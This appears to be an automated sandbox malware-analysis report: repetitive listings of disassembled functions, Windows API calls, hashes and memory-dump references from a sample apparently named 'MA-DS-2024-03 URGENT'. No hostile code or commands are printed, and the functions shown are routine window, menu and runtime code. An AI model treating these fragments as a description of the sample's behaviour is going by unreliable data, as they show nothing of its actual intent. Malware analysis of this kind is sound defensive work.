                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                        • String ID: BUTTON
                                                        • API String ID: 1194449130-3405671355
                                                        • Opcode ID: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                                        • Instruction ID: 17ca608856519cd1955488b4f204772d3e00e2da9bda675b1abbe090807247ff
                                                        • Opcode Fuzzy Hash: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                                                        • Instruction Fuzzy Hash: A521A174200605BFEB505F60FC88F2A3BA9EB44749F25543EF102922B1EB758D549B6F
                                                        Function 0045C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000001), ref: 0045C283
                                                        • GetWindowRect.USER32(00000000,?), ref: 0045C295
                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
                                                        • GetDlgItem.USER32(?,00000002), ref: 0045C2FE
                                                        • GetWindowRect.USER32(00000000,?), ref: 0045C310
                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
                                                        • GetDlgItem.USER32(?,000003E9), ref: 0045C372
                                                        • GetWindowRect.USER32(00000000,?), ref: 0045C383
                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
                                                        • GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                        • String ID:
                                                        • API String ID: 3096461208-0
                                                        • Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                        • Instruction ID: 11649da17df5d0755d73b9da25d5b781727aa351e01af551b5c423be9c7c6dfa
                                                        • Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                        • Instruction Fuzzy Hash: 62517071B00305AFDB08CFA9DD89AAEBBB6EB88311F14853DF915E7291D7709D448B14
                                                        Function 0040201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
                                                        • KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
                                                        • DeleteObject.GDI32(00000000), ref: 0043BD1C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                        • String ID:
                                                        • API String ID: 641708696-0
                                                        • Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                        • Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
                                                        • Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                                                        • Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99
                                                        Function 004021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                        • GetSysColor.USER32(0000000F), ref: 004021D3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ColorLongWindow
                                                        • String ID:
                                                        • API String ID: 259745315-0
                                                        • Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                                        • Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
                                                        • Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                                        • Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69
                                                        Function 0046A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
                                                        • GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
                                                        • _wcscpy.LIBCMT ref: 0046A9FF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                        • API String ID: 2820617543-1000479233
                                                        • Opcode ID: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                                                        • Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
                                                        • Opcode Fuzzy Hash: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                                                        • Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B
                                                        Function 00487152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 0048716A
                                                        • CreateMenu.USER32 ref: 00487185
                                                        • SetMenu.USER32(?,00000000), ref: 00487194
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
                                                        • IsMenu.USER32(?), ref: 00487237
                                                        • CreatePopupMenu.USER32 ref: 00487241
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
                                                        • DrawMenuBar.USER32 ref: 00487276
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                        • String ID: 0$F
                                                        • API String ID: 176399719-3044882817
                                                        • Opcode ID: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                                        • Instruction ID: ef621a00a8965f8f9a50d7f8a7e1c0e3a51c02c5d80a3ac9dc969039337b3b35
                                                        • Opcode Fuzzy Hash: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                                        • Instruction Fuzzy Hash: 2A419B74A01204EFDB10EF64D898E9E7BB5FF09300F240469F915A7361D735A910DF98
                                                        Function 004874BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0048755E
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00487565
                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00487578
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00487580
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0048758B
                                                        • DeleteDC.GDI32(00000000), ref: 00487594
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0048759E
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004875B2
                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004875BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                        • String ID: static
                                                        • API String ID: 2559357485-2160076837
                                                        • Opcode ID: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                                                        • Instruction ID: 1923f87f84a105141cc97cd4dfb73f9ea5de9f9edaf5dec82e4c1ac095da0f9d
                                                        • Opcode Fuzzy Hash: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                                                        • Instruction Fuzzy Hash: FA316D72104214BBDF11AF64DC08FDF3BA9FF09364F210A29FA15A61A0D739D815DBA8
                                                        Function 00426E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00426E3E
                                                          • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                        • __gmtime64_s.LIBCMT ref: 00426ED7
                                                        • __gmtime64_s.LIBCMT ref: 00426F0D
                                                        • __gmtime64_s.LIBCMT ref: 00426F2A
                                                        • __allrem.LIBCMT ref: 00426F80
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
                                                        • __allrem.LIBCMT ref: 00426FB3
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
                                                        • __allrem.LIBCMT ref: 00426FE8
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
                                                        • __invoke_watson.LIBCMT ref: 00427077
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                        • String ID:
                                                        • API String ID: 384356119-0
                                                        • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                        • Instruction ID: cc18d51bddcb3bff235d9ba930da6ebb912618c2495e950f743dda1aeb2a8d13
                                                        • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                        • Instruction Fuzzy Hash: F8710876B00726ABD714AF79EC41B5BB3A4AF04328F55412FF514D7281EB78ED048B98
                                                        Function 00462527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00462542
                                                        • GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
                                                        • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
                                                        • Sleep.KERNEL32(000001F4), ref: 004625EB
                                                        • GetMenuItemCount.USER32(?), ref: 0046262F
                                                        • GetMenuItemID.USER32(?,00000000), ref: 0046264B
                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00462675
                                                        • GetMenuItemID.USER32(?,?), ref: 004626BA
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                        • String ID:
                                                        • API String ID: 4176008265-0
                                                        • Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                        • Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
                                                        • Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                        • Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A
                                                        Function 00486F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
                                                        • _memset.LIBCMT ref: 00486FDD
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow_memset
                                                        • String ID:
                                                        • API String ID: 830647256-0
                                                        • Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                        • Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
                                                        • Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                        • Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64
                                                        Function 00456B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
                                                        • VariantInit.OLEAUT32(?), ref: 00456C2A
                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
                                                        • VariantCopy.OLEAUT32(?,?), ref: 00456C9D
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
                                                        • VariantClear.OLEAUT32(?), ref: 00456CC6
                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
                                                        • VariantClear.OLEAUT32(?), ref: 00456CEE
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                        • String ID:
                                                        • API String ID: 2706829360-0
                                                        • Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                        • Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
                                                        • Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                        • Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94
                                                        Function 004783BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                        • CoInitialize.OLE32 ref: 00478403
                                                        • CoUninitialize.OLE32 ref: 0047840E
                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
                                                        • IIDFromString.OLE32(?,?), ref: 004784E1
                                                        • VariantInit.OLEAUT32(?), ref: 0047857B
                                                        • VariantClear.OLEAUT32(?), ref: 004785DC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                        • API String ID: 834269672-1287834457
                                                        • Opcode ID: bddeeabf73b366b14407c3e71f23e64711764d0829d4ad9168793951bdc54c34
                                                        • Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
                                                        • Opcode Fuzzy Hash: bddeeabf73b366b14407c3e71f23e64711764d0829d4ad9168793951bdc54c34
                                                        • Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A
                                                        Function 0046B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
                                                        • GetLastError.KERNEL32 ref: 0046B550
                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
